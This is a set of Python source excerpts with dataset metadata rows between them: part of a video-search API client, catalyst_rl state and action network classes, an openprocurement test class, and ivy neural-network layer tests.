:param float fps: (Deprecated; use fps_from and fps_to instead) Show videos with the specified frames per second
:param float fps_from: Show videos with the specified frames per second or more
:param float fps_to: Show videos with the specified frames per second or fewer
:param str language: Set query and result language (uses Accept-Language header if not set)
:param list[str] license: Show only videos with the specified license or licenses
:param list[str] model: Show videos with each of the specified models
:param int page: Page number
:param int per_page: Number of results per page
:param str people_age: Show videos that feature people of the specified age range
:param str people_ethnicity: Show videos with people of the specified ethnicity
:param str people_gender: Show videos with people with the specified gender
:param int people_number: Show videos with the specified number of people
:param bool people_model_released: Show only videos of people with a signed model release
:param str query: One or more search terms separated by spaces; you can use NOT to filter out videos that match a term
:param str resolution: Show videos with the specified resolution
:param bool safe: Enable or disable safe search
:param str sort: Sort by one of these categories
:param str view: Amount of detail to render in the response
:return: VideoSearchResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['added_date', 'added_date_start', 'added_date_end', 'aspect_ratio', 'category', 'contributor', 'duration', 'duration_from', 'duration_to', 'fps', 'fps_from', 'fps_to', 'language', 'license', 'model', 'page', 'per_page', 'people_age', 'people_ethnicity', 'people_gender', 'people_number', 'people_model_released', 'query', 'resolution', 'safe', 'sort', 'view'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_videos" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `search_videos`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 500: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `search_videos`, must be a value less than or equal to `500`") # noqa: E501
if 'per_page' in params and params['per_page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `search_videos`, must be a value greater than or equal to `0`") # noqa: E501
if 'people_number' in params and params['people_number'] > 4: # noqa: E501
raise ValueError("Invalid value for parameter `people_number` when calling `search_videos`, must be a value less than or equal to `4`") # noqa: E501
if 'people_number' in params and params['people_number'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `people_number` when calling `search_videos`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'added_date' in params:
query_params.append(('added_date', params['added_date'])) # noqa: E501
if 'added_date_start' in params:
query_params.append(('added_date_start', params['added_date_start'])) # noqa: E501
if 'added_date_end' in params:
query_params.append(('added_date_end', params['added_date_end'])) # noqa: E501
if 'aspect_ratio' in params:
query_params.append(('aspect_ratio', params['aspect_ratio'])) # noqa: E501
if 'category' in params:
query_params.append(('category', params['category'])) # noqa: E501
if 'contributor' in params:
query_params.append(('contributor', params['contributor'])) # noqa: E501
collection_formats['contributor'] = 'multi' # noqa: E501
if 'duration' in params:
query_params.append(('duration', params['duration'])) # noqa: E501
if 'duration_from' in params:
query_params.append(('duration_from', params['duration_from'])) # noqa: E501
if 'duration_to' in params:
query_params.append(('duration_to', params['duration_to'])) # noqa: E501
if 'fps' in params:
query_params.append(('fps', params['fps'])) # noqa: E501
if 'fps_from' in params:
query_params.append(('fps_from', params['fps_from'])) # noqa: E501
if 'fps_to' in params:
query_params.append(('fps_to', params['fps_to'])) # noqa: E501
if 'language' in params:
query_params.append(('language', params['language'])) # noqa: E501
if 'license' in params:
query_params.append(('license', params['license'])) # noqa: E501
collection_formats['license'] = 'multi' # noqa: E501
if 'model' in params:
query_params.append(('model', params['model'])) # noqa: E501
collection_formats['model'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'people_age' in params:
query_params.append(('people_age', params['people_age'])) # noqa: E501
if 'people_ethnicity' in params:
query_params.append(('people_ethnicity', params['people_ethnicity'])) # noqa: E501
if 'people_gender' in params:
query_params.append(('people_gender', params['people_gender'])) # noqa: E501
if 'people_number' in params:
query_params.append(('people_number', params['people_number'])) # noqa: E501
if 'people_model_released' in params:
query_params.append(('people_model_released', params['people_model_released'])) # noqa: E501
if 'query' in params:
query_params.append(('query', params['query'])) # noqa: E501
if 'resolution' in params:
query_params.append(('resolution', params['resolution'])) # noqa: E501
if 'safe' in params:
query_params.append(('safe', params['safe'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'view' in params:
query_params.append(('view', params['view'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VideoSearchResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.53358
| 460
| 0.623641
| 10,625
| 86,104
| 4.864094
| 0.036424
| 0.051547
| 0.025657
| 0.023684
| 0.952478
| 0.944099
| 0.931909
| 0.925872
| 0.924344
| 0.919584
| 0
| 0.018058
| 0.288686
| 86,104
| 1,890
| 461
| 45.557672
| 0.825755
| 0.384802
| 0
| 0.753385
| 0
| 0.019342
| 0.225804
| 0.038015
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033849
| false
| 0
| 0.003868
| 0
| 0.088008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c315975731d361802e40ae5d3289e530cb7b083d
| 9,883
|
py
|
Python
|
catalyst_rl/rl/agent/network.py
|
rhololkeolke/catalyst-rl
|
ec18ff4a58b6d00652f772231db8de86debb4b3d
|
[
"Apache-2.0"
] | 46
|
2020-03-27T20:12:32.000Z
|
2021-11-21T19:08:51.000Z
|
catalyst_rl/rl/agent/network.py
|
rhololkeolke/catalyst-rl
|
ec18ff4a58b6d00652f772231db8de86debb4b3d
|
[
"Apache-2.0"
] | 2
|
2020-04-06T10:43:04.000Z
|
2020-07-01T18:26:10.000Z
|
catalyst_rl/rl/agent/network.py
|
rhololkeolke/catalyst-rl
|
ec18ff4a58b6d00652f772231db8de86debb4b3d
|
[
"Apache-2.0"
] | 5
|
2020-04-17T14:09:53.000Z
|
2021-05-10T08:58:29.000Z
|
import collections
import torch
import torch.nn as nn
from catalyst_rl.contrib.models import get_linear_net
from catalyst_rl.contrib.nn.modules import LamaPooling, TemporalConcatPooling
from catalyst_rl.rl import utils
class StateNet(nn.Module):
def __init__(
self,
main_net: nn.Module,
observation_net: nn.Module = None,
aggregation_net: nn.Module = None,
):
"""
Abstract network, that takes some tensor
T of shape [bs; history_len; ...]
and outputs some representation tensor R
of shape [bs; representation_size]
input_T [bs; history_len; in_features]
-> observation_net (aka observation_encoder) ->
observations_representations [bs; history_len; obs_features]
-> aggregation_net (flatten in simplified case) ->
aggregated_representation [bs; hid_features]
-> main_net ->
output_T [bs; representation_size]
Args:
main_net:
observation_net:
aggregation_net:
"""
super().__init__()
self.main_net = main_net
self.observation_net = observation_net or (lambda x: x)
self.aggregation_net = aggregation_net
self._forward_fn = None
if aggregation_net is None:
self._forward_fn = self._forward_ff
self._process_state = utils.process_state_ff_kv \
if isinstance(self.observation_net, nn.ModuleDict) \
else utils.process_state_ff
elif isinstance(aggregation_net, (TemporalConcatPooling, LamaPooling)):
self._forward_fn = self._forward_temporal
self._process_state = utils.process_state_temporal_kv \
if isinstance(self.observation_net, nn.ModuleDict) \
else utils.process_state_temporal
else:
raise NotImplementedError()
def _forward_ff(self, state):
x = state
x = self._process_state(x, self.observation_net)
x = self.main_net(x)
return x
def _forward_temporal(self, state):
x = state
x = self._process_state(x, self.observation_net)
x = self.aggregation_net(x)
x = self.main_net(x)
return x
def forward(self, state):
x = self._forward_fn(state)
return x
@classmethod
def get_from_params(
cls,
state_shape,
observation_net_params=None,
aggregation_net_params=None,
main_net_params=None,
) -> "StateNet":
assert main_net_params is not None
# @TODO: refactor, too complicated; fast&furious development
main_net_in_features = 0
observation_net_out_features = 0
# observation net
if observation_net_params is not None:
key_value_flag = observation_net_params.pop("_key_value", False)
if key_value_flag:
observation_net = collections.OrderedDict()
for key in observation_net_params:
net_, out_features_ = \
utils.get_observation_net(
state_shape[key],
**observation_net_params[key]
)
observation_net[key] = net_
observation_net_out_features += out_features_
observation_net = nn.ModuleDict(observation_net)
else:
observation_net, observation_net_out_features = \
utils.get_observation_net(
state_shape,
**observation_net_params
)
main_net_in_features += observation_net_out_features
else:
observation_net, observation_net_out_features = \
utils.get_observation_net(state_shape)
main_net_in_features += observation_net_out_features
# aggregation net
if aggregation_net_params is not None:
aggregation_type = \
aggregation_net_params.pop("_network_type", "concat")
if aggregation_type == "concat":
aggregation_net = TemporalConcatPooling(
observation_net_out_features, **aggregation_net_params
)
elif aggregation_type == "lama":
aggregation_net = LamaPooling(
observation_net_out_features, **aggregation_net_params
)
else:
raise NotImplementedError()
main_net_in_features = aggregation_net.out_features
else:
aggregation_net = None
# main net
main_net_params["in_features"] = main_net_in_features
main_net = get_linear_net(**main_net_params)
net = cls(
main_net=main_net,
aggregation_net=aggregation_net,
observation_net=observation_net
)
return net
class StateActionNet(nn.Module):
def __init__(
self,
main_net: nn.Module,
observation_net: nn.Module = None,
action_net: nn.Module = None,
aggregation_net: nn.Module = None
):
super().__init__()
self.main_net = main_net
self.observation_net = observation_net or (lambda x: x)
self.action_net = action_net or (lambda x: x)
self.aggregation_net = aggregation_net
self._forward_fn = None
if aggregation_net is None:
self._forward_fn = self._forward_ff
self._process_state = utils.process_state_ff_kv \
if isinstance(self.observation_net, nn.ModuleDict) \
else utils.process_state_ff
elif isinstance(aggregation_net, (TemporalConcatPooling, LamaPooling)):
self._forward_fn = self._forward_temporal
self._process_state = utils.process_state_temporal_kv \
if isinstance(self.observation_net, nn.ModuleDict) \
else utils.process_state_temporal
else:
raise NotImplementedError()
def _forward_ff(self, state, action):
state_ = self._process_state(state, self.observation_net)
action_ = self.action_net(action)
x = torch.cat((state_, action_), dim=1)
x = self.main_net(x)
return x
def _forward_temporal(self, state, action):
state_ = self._process_state(state, self.observation_net)
state_ = self.aggregation_net(state_)
action_ = self.action_net(action)
x = torch.cat((state_, action_), dim=1)
x = self.main_net(x)
return x
def forward(self, state, action):
x = self._forward_fn(state, action)
return x
@classmethod
def get_from_params(
cls,
state_shape,
action_shape,
observation_net_params=None,
action_net_params=None,
aggregation_net_params=None,
main_net_params=None,
) -> "StateNet":
assert main_net_params is not None
# @TODO: refactor, too complicated; fast&furious development
main_net_in_features = 0
observation_net_out_features = 0
# observation net
if observation_net_params is not None:
key_value_flag = observation_net_params.pop("_key_value", False)
if key_value_flag:
observation_net = collections.OrderedDict()
for key in observation_net_params:
net_, out_features_ = \
utils.get_observation_net(
state_shape[key],
**observation_net_params[key]
)
observation_net[key] = net_
observation_net_out_features += out_features_
observation_net = nn.ModuleDict(observation_net)
else:
observation_net, observation_net_out_features = \
utils.get_observation_net(
state_shape,
**observation_net_params
)
else:
observation_net, observation_net_out_features = \
utils.get_observation_net(state_shape)
main_net_in_features += observation_net_out_features
# aggregation net
if aggregation_net_params is not None:
aggregation_type = \
aggregation_net_params.pop("_network_type", "concat")
if aggregation_type == "concat":
aggregation_net = TemporalConcatPooling(
observation_net_out_features, **aggregation_net_params
)
elif aggregation_type == "lama":
aggregation_net = LamaPooling(
observation_net_out_features, **aggregation_net_params
)
else:
raise NotImplementedError()
main_net_in_features = aggregation_net.out_features
else:
aggregation_net = None
# action net
if action_net_params is not None:
# @TODO: hacky solution for code reuse
action_shape = (1, ) + action_shape
action_net, action_net_out_features = \
utils.get_observation_net(action_shape, **action_net_params)
else:
action_net, action_net_out_features = \
utils.get_observation_net(action_shape)
main_net_in_features += action_net_out_features
# main net
main_net_params["in_features"] = main_net_in_features
main_net = get_linear_net(**main_net_params)
net = cls(
observation_net=observation_net,
action_net=action_net,
aggregation_net=aggregation_net,
main_net=main_net
)
return net
__all__ = ["StateNet", "StateActionNet"]
| 34.43554
| 79
| 0.597997
| 1,041
| 9,883
| 5.268012
| 0.108549
| 0.176149
| 0.056163
| 0.068381
| 0.83151
| 0.802881
| 0.798869
| 0.798869
| 0.791211
| 0.778993
| 0
| 0.001067
| 0.336234
| 9,883
| 286
| 80
| 34.555944
| 0.834909
| 0.077203
| 0
| 0.790698
| 0
| 0
| 0.015376
| 0
| 0
| 0
| 0
| 0.003497
| 0.009302
| 1
| 0.046512
| false
| 0
| 0.027907
| 0
| 0.12093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c328125a6127ab0080d4fc450699b7b4feb4a8dc
| 325
|
py
|
Python
|
src/openprocurement/tender/esco/tests/qualification_milestone.py
|
pontostroy/api
|
5afdd3a62a8e562cf77e2d963d88f1a26613d16a
|
[
"Apache-2.0"
] | 10
|
2020-02-18T01:56:21.000Z
|
2022-03-28T00:32:57.000Z
|
src/openprocurement/tender/esco/tests/qualification_milestone.py
|
pontostroy/api
|
5afdd3a62a8e562cf77e2d963d88f1a26613d16a
|
[
"Apache-2.0"
] | 26
|
2018-07-16T09:30:44.000Z
|
2021-02-02T17:51:30.000Z
|
src/openprocurement/tender/esco/tests/qualification_milestone.py
|
pontostroy/api
|
5afdd3a62a8e562cf77e2d963d88f1a26613d16a
|
[
"Apache-2.0"
] | 15
|
2019-08-08T10:50:47.000Z
|
2022-02-05T14:13:36.000Z
|
from openprocurement.tender.esco.tests.qualification import TenderQualificationBaseTestCase
from openprocurement.tender.core.tests.qualification_milestone import TenderQualificationMilestone24HMixin
class TenderQualificationMilestoneTestCase(TenderQualificationMilestone24HMixin, TenderQualificationBaseTestCase):
pass
| 46.428571
| 114
| 0.907692
| 22
| 325
| 13.363636
| 0.636364
| 0.129252
| 0.170068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013029
| 0.055385
| 325
| 6
| 115
| 54.166667
| 0.944625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
c35d1345f165394b5fb2dd8e1472f7b8b1d4963e
| 32,172
|
py
|
Python
|
ivy_tests/test_ivy/test_functional/test_nn/test_layers.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_nn/test_layers.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_nn/test_layers.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
"""Collection of tests for unified neural network layers."""
# global
import pytest
import numpy as np
from hypothesis import given, strategies as st
# local
import ivy
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# Linear #
# -------#
# linear
@pytest.mark.parametrize(
"x_n_w_n_b_n_res",
[
(
[[1.0, 2.0, 3.0]],
[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]],
[2.0, 2.0],
[[8.0, 8.0]],
),
(
[[[1.0, 2.0, 3.0]]],
[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]],
[2.0, 2.0],
[[[8.0, 8.0]]],
),
(
[[[1.0, 2.0, 3.0]], [[4.0, 5.0, 6.0]]],
[[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]], [[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]]],
[[2.0, 2.0], [4.0, 4.0]],
[[[8.0, 8.0]], [[34.0, 34.0]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_linear(x_n_w_n_b_n_res, dtype, tensor_fn, device, call):
# smoke test
x, weight, bias, true_res = x_n_w_n_b_n_res
x = tensor_fn(x, dtype, device)
weight = tensor_fn(weight, dtype, device)
bias = tensor_fn(bias, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.linear(x, weight, bias)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(call(ivy.linear, x, weight, bias), ivy.to_numpy(true_res))
# Dropout #
# --------#
# dropout
# @pytest.mark.parametrize("x", [([[1.0, 2.0, 3.0]]), ([[[1.0, 2.0, 3.0]]])])
# @pytest.mark.parametrize("dtype", ["float32"])
# @pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
@given(
array_shape=helpers.lists(
st.integers(1, 3), min_size="num_dims", max_size="num_dims", size_bounds=[1, 3]),
dtype=st.sampled_from(ivy_np.valid_numeric_dtypes),
as_variable=st.booleans()
)
def test_dropout(array_shape, dtype, as_variable, fw, device, call):
if (fw == 'tensorflow' or fw == 'torch') and 'int' in dtype:
return
x = np.random.uniform(size=tuple(array_shape))
x = ivy.asarray(x)
if as_variable:
x = ivy.variable(x)
# smoke test
ret = ivy.dropout(x, 0.9)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
ivy.seed(0)
assert np.min(call(ivy.dropout, x, 0.9)) == 0.0
# Attention #
# ----------#
# # scaled_dot_product_attention
@pytest.mark.parametrize(
"q_n_k_n_v_n_s_n_m_n_gt", [([[1.0]], [[2.0]], [[3.0]], 2.0, [[1.0]], [[3.0]])]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_scaled_dot_product_attention(
q_n_k_n_v_n_s_n_m_n_gt, dtype, tensor_fn, device, call
):
q, k, v, scale, mask, ground_truth = q_n_k_n_v_n_s_n_m_n_gt
# smoke test
q = tensor_fn(q, dtype, device)
k = tensor_fn(k, dtype, device)
v = tensor_fn(v, dtype, device)
mask = tensor_fn(mask, dtype, device)
ret = ivy.scaled_dot_product_attention(q, k, v, scale, mask)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == q.shape
# value test
assert np.allclose(
call(ivy.scaled_dot_product_attention, q, k, v, scale, mask),
np.array(ground_truth),
)
# multi_head_attention
@pytest.mark.parametrize(
"x_n_s_n_m_n_c_n_gt",
[([[3.0]], 2.0, [[1.0]], [[4.0, 5.0]], [[4.0, 5.0, 4.0, 5.0]])],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_multi_head_attention(x_n_s_n_m_n_c_n_gt, dtype, tensor_fn, device, call):
x, scale, mask, context, ground_truth = x_n_s_n_m_n_c_n_gt
# smoke test
x = tensor_fn(x, dtype, device)
context = tensor_fn(context, dtype, device)
mask = tensor_fn(mask, dtype, device)
fn = lambda x_, v: ivy.tile(x_, (1, 2))
ret = ivy.multi_head_attention(x, scale, 2, context, mask, fn, fn, fn)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(np.array(ground_truth).shape)
# value test
assert np.allclose(
call(ivy.multi_head_attention, x, scale, 2, context, mask, fn, fn, fn),
np.array(ground_truth),
)
# Convolutions #
# -------------#
# conv1d
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_res",
[
(
[[[0.0], [3.0], [0.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
"SAME",
[[[0.0], [3.0], [0.0]]],
),
(
[[[0.0], [3.0], [0.0]] for _ in range(5)],
[[[0.0]], [[1.0]], [[0.0]]],
"SAME",
[[[0.0], [3.0], [0.0]] for _ in range(5)],
),
([[[0.0], [3.0], [0.0]]], [[[0.0]], [[1.0]], [[0.0]]], "VALID", [[[3.0]]]),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv1d(x_n_filters_n_pad_n_res, dtype, tensor_fn, device, call):
x, filters, padding, true_res = x_n_filters_n_pad_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv1d(x, filters, 1, padding)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(call(ivy.conv1d, x, filters, 1, padding), ivy.to_numpy(true_res))
# conv1d_transpose
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_outshp_n_res",
[
(
[[[0.0], [3.0], [0.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
"SAME",
(1, 3, 1),
[[[0.0], [3.0], [0.0]]],
),
(
[[[0.0], [3.0], [0.0]] for _ in range(5)],
[[[0.0]], [[1.0]], [[0.0]]],
"SAME",
(5, 3, 1),
[[[0.0], [3.0], [0.0]] for _ in range(5)],
),
(
[[[0.0], [3.0], [0.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
"VALID",
(1, 5, 1),
[[[0.0], [0.0], [3.0], [0.0], [0.0]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv1d_transpose(
x_n_filters_n_pad_n_outshp_n_res, dtype, tensor_fn, device, call
):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf conv1d transpose does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
if call in [helpers.np_call, helpers.jnp_call]:
# numpy and jax do not yet support conv1d_transpose
pytest.skip()
x, filters, padding, output_shape, true_res = x_n_filters_n_pad_n_outshp_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv1d_transpose(x, filters, 1, padding, output_shape)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(
call(ivy.conv1d_transpose, x, filters, 1, padding, output_shape),
ivy.to_numpy(true_res),
)
# conv2d
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_res",
[
(
[
[
[[1.0], [2.0], [3.0], [4.0], [5.0]],
[[6.0], [7.0], [8.0], [9.0], [10.0]],
[[11.0], [12.0], [13.0], [14.0], [15.0]],
[[16.0], [17.0], [18.0], [19.0], [20.0]],
[[21.0], [22.0], [23.0], [24.0], [25.0]],
]
],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"SAME",
[
[
[[9.0], [13.0], [17.0], [21.0], [19.0]],
[[25.0], [35.0], [40.0], [45.0], [39.0]],
[[45.0], [60.0], [65.0], [70.0], [59.0]],
[[65.0], [85.0], [90.0], [95.0], [79.0]],
[[59.0], [83.0], [87.0], [91.0], [69.0]],
]
],
),
(
[
[
[[1.0], [2.0], [3.0], [4.0], [5.0]],
[[6.0], [7.0], [8.0], [9.0], [10.0]],
[[11.0], [12.0], [13.0], [14.0], [15.0]],
[[16.0], [17.0], [18.0], [19.0], [20.0]],
[[21.0], [22.0], [23.0], [24.0], [25.0]],
]
for _ in range(5)
],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"SAME",
[
[
[[9.0], [13.0], [17.0], [21.0], [19.0]],
[[25.0], [35.0], [40.0], [45.0], [39.0]],
[[45.0], [60.0], [65.0], [70.0], [59.0]],
[[65.0], [85.0], [90.0], [95.0], [79.0]],
[[59.0], [83.0], [87.0], [91.0], [69.0]],
]
for _ in range(5)
],
),
(
[
[
[[1.0], [2.0], [3.0], [4.0], [5.0]],
[[6.0], [7.0], [8.0], [9.0], [10.0]],
[[11.0], [12.0], [13.0], [14.0], [15.0]],
[[16.0], [17.0], [18.0], [19.0], [20.0]],
[[21.0], [22.0], [23.0], [24.0], [25.0]],
]
],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"VALID",
[
[
[[35.0], [40.0], [45.0]],
[[60.0], [65.0], [70.0]],
[[85.0], [90.0], [95.0]],
]
],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv2d(x_n_filters_n_pad_n_res, dtype, tensor_fn, device, call):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf conv2d does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
x, filters, padding, true_res = x_n_filters_n_pad_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv2d(x, filters, 1, padding)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(call(ivy.conv2d, x, filters, 1, padding), ivy.to_numpy(true_res))
# conv2d_transpose
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_outshp_n_res",
[
(
[[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"SAME",
(1, 3, 3, 1),
[[[[0.0], [3.0], [0.0]], [[3.0], [3.0], [3.0]], [[0.0], [3.0], [0.0]]]],
),
(
[
[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]
for _ in range(5)
],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"SAME",
(5, 3, 3, 1),
[
[[[0.0], [3.0], [0.0]], [[3.0], [3.0], [3.0]], [[0.0], [3.0], [0.0]]]
for _ in range(5)
],
),
(
[[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]],
[
[[[0.0]], [[1.0]], [[0.0]]],
[[[1.0]], [[1.0]], [[1.0]]],
[[[0.0]], [[1.0]], [[0.0]]],
],
"VALID",
(1, 5, 5, 1),
[
[
[[0.0], [0.0], [0.0], [0.0], [0.0]],
[[0.0], [0.0], [3.0], [0.0], [0.0]],
[[0.0], [3.0], [3.0], [3.0], [0.0]],
[[0.0], [0.0], [3.0], [0.0], [0.0]],
[[0.0], [0.0], [0.0], [0.0], [0.0]],
]
],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_conv2d_transpose(
x_n_filters_n_pad_n_outshp_n_res, dtype, tensor_fn, device, call
):
if call in [helpers.tf_call, helpers.tf_graph_call] and "cpu" in device:
# tf conv2d transpose does not work when CUDA is installed, but array is on CPU
pytest.skip()
# smoke test
if call in [helpers.np_call, helpers.jnp_call]:
# numpy and jax do not yet support conv2d_transpose
pytest.skip()
x, filters, padding, output_shape, true_res = x_n_filters_n_pad_n_outshp_n_res
x = tensor_fn(x, dtype, device)
filters = tensor_fn(filters, dtype, device)
true_res = tensor_fn(true_res, dtype, device)
ret = ivy.conv2d_transpose(x, filters, 1, padding, output_shape)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == true_res.shape
# value test
assert np.allclose(
call(ivy.conv2d_transpose, x, filters, 1, padding, output_shape),
ivy.to_numpy(true_res),
)
# depthwise_conv2d
@pytest.mark.parametrize(
"x_n_filters_n_pad_n_res",
[
(
[[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]],
[[[0.0], [1.0], [0.0]], [[1.0], [1.0], [1.0]], [[0.0], [1.0], [0.0]]],
"SAME",
[[[[0.0], [3.0], [0.0]], [[3.0], [3.0], [3.0]], [[0.0], [3.0], [0.0]]]],
),
(
[
[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]
for _ in range(5)
],
[[[0.0], [1.0], [0.0]], [[1.0], [1.0], [1.0]], [[0.0], [1.0], [0.0]]],
"SAME",
[
[[[0.0], [3.0], [0.0]], [[3.0], [3.0], [3.0]], [[0.0], [3.0], [0.0]]]
for _ in range(5)
],
),
(
[[[[0.0], [0.0], [0.0]], [[0.0], [3.0], [0.0]], [[0.0], [0.0], [0.0]]]],
[[[0.0], [1.0], [0.0]], [[1.0], [1.0], [1.0]], [[0.0], [1.0], [0.0]]],
"VALID",
[[[[3.0]]]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
